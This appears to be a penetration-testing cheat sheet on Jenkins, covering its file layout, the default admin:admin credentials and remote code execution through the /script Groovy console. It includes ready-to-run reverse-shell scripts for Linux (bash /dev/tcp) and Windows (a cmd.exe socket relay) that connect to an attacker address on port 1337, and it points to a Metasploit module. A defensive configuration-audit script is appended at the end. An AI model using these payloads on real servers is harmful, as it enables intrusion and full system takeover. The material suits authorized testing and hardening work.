
Jenkins

Jenkins is an open-source automation server used for continuous integration (CI) and continuous deployment (CD). It automates building, testing, and deploying applications, making it essential for DevOps workflows. Jenkins supports a wide range of plugins for integrating with different tools and services.

Tech Stack of Jenkins

  • Backend: Java (runs on Java Virtual Machine)
  • Frontend: HTML, CSS, JavaScript (UI-based management)
  • Database: Uses built-in storage (can be configured with MySQL, PostgreSQL, etc.)
  • Server: Jenkins (self-contained), can be run on Apache Tomcat or as a standalone service

File Structure

/jenkins-root
├── bin/                    # Executable scripts for starting/stopping Jenkins
│   ├── jenkins.sh          # Script to start Jenkins (Linux/macOS)
│   └── jenkins.bat         # Windows script to start Jenkins
├── config/                 # Configuration files for Jenkins
│   ├── jenkins.xml         # Main Jenkins configuration (when running as a service)
│   ├── config.xml          # Global Jenkins settings
│   ├── credentials.xml     # Stores Jenkins credentials (hashed)
│   ├── nodeMonitors.xml    # Configuration for Jenkins node monitoring
│   └── updates/            # Stores update-related data
├── logs/                   # Log files for Jenkins runtime (jenkins.log, access.log, etc.)
├── plugins/                # Installed plugins (JAR files for added functionality)
├── jobs/                   # Jenkins job configurations
│   └── <job-name>/         # Each job has its own directory
│       ├── config.xml      # Job-specific settings
│       ├── builds/         # Build history for the job
│       └── workspace/      # Workspace used for builds
├── users/                  # User-related configuration files
│   └── <username>/         # Each user has a separate directory
│       └── config.xml      # User-specific settings
├── secrets/                # Stores sensitive information like API tokens
│   ├── master.key          # Encryption key for secrets
│   └── hudson.util.Secret  # Encrypted secrets file
├── war/                    # Jenkins WAR file (if running standalone)
├── workspace/              # Default workspace for builds
├── LICENSE                 # Jenkins license file
└── README.md               # Basic information about Jenkins

Tip: Jenkins is commonly hosted on Windows servers, running as the SYSTEM account.


Enumeration

  • The login page says "Welcome to Jenkins."
  • Default credentials are admin:admin.
  • Once logged in, we can find the Jenkins version in the page footer.

Exploitation

RCE with Groovy Script

  • Visit http://site.rezydev.xyz:8080/script
  • Here we paste our reverse-shell Apache Groovy script into the script console and run it.

Jenkins on Linux

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.10.10/1337;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Jenkins on Windows

String host = "10.10.10.10";
int port = 1337;
String cmd = "cmd.exe";
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while (!s.isClosed()) {
    while (pi.available() > 0) so.write(pi.read());
    while (pe.available() > 0) so.write(pe.read());
    while (si.available() > 0) po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    try { p.exitValue(); break; } catch (Exception e) {}
}
p.destroy();
s.close();

Automated RCE with Metasploit

  • Use the Metasploit module exploit/multi/http/jenkins_script_console for automated RCE.
  • Metasploit automates the same script-console steps, making exploitation easier.
  • This gives us a Meterpreter shell, which is powerful and offers advanced post-exploitation functionality.
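As an added, defender-side example that is not part of the original page: a Python audit of the global config.xml (listed under config/ above) that flags the settings which leave the script console reachable without a real login, i.e. the conditions both the manual Groovy route and the Metasploit module depend on. The two sample configs are constructed and abridged; the element and class names are the ones Jenkins itself writes, and the audit_config function is a name chosen here.

```python
import xml.etree.ElementTree as ET

# Constructed, abridged samples of a Jenkins global config.xml (not from a real install).
WEAK_CONFIG = """<hudson>
  <useSecurity>false</useSecurity>
  <authorizationStrategy class="hudson.security.AuthorizationStrategy$Unsecured"/>
  <securityRealm class="hudson.security.SecurityRealm$None"/>
</hudson>"""

HARDENED_CONFIG = """<hudson>
  <useSecurity>true</useSecurity>
  <authorizationStrategy class="hudson.security.FullControlOnceLoggedInAuthorizationStrategy">
    <denyAnonymousReadAccess>true</denyAnonymousReadAccess>
  </authorizationStrategy>
  <securityRealm class="hudson.security.HudsonPrivateSecurityRealm">
    <disableSignup>true</disableSignup>
  </securityRealm>
</hudson>"""


def _flag(elem, tag):
    """Boolean value of a child element; a missing element counts as false."""
    return (elem.findtext(tag) or "false").strip().lower() == "true"


def audit_config(xml_text):
    """Return findings that would let an unauthenticated or self-registered
    user reach /script (the Groovy console) with administrator rights."""
    root = ET.fromstring(xml_text)
    findings = []
    if not _flag(root, "useSecurity"):
        findings.append("useSecurity=false: every visitor is an administrator, including on /script")
    auth = root.find("authorizationStrategy")
    auth_cls = auth.get("class", "") if auth is not None else ""
    if auth is None or auth_cls.endswith("AuthorizationStrategy$Unsecured"):
        findings.append("authorizationStrategy=Unsecured: no permission checks on any action")
    elif auth_cls.endswith("FullControlOnceLoggedInAuthorizationStrategy") and not _flag(auth, "denyAnonymousReadAccess"):
        findings.append("anonymous read access allowed: version and job data exposed before login")
    realm = root.find("securityRealm")
    realm_cls = realm.get("class", "") if realm is not None else ""
    if realm is None or realm_cls.endswith("SecurityRealm$None"):
        findings.append("securityRealm=None: no login required at all")
    elif realm_cls.endswith("HudsonPrivateSecurityRealm") and not _flag(realm, "disableSignup"):
        findings.append("self-signup enabled: anyone can register and log in")
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_config(cfg) or ["no findings"])
```

Run it against $JENKINS_HOME/config.xml from a backup; a clean result still leaves default admin:admin credentials to verify separately, since those live in the user's own config.xml under users/.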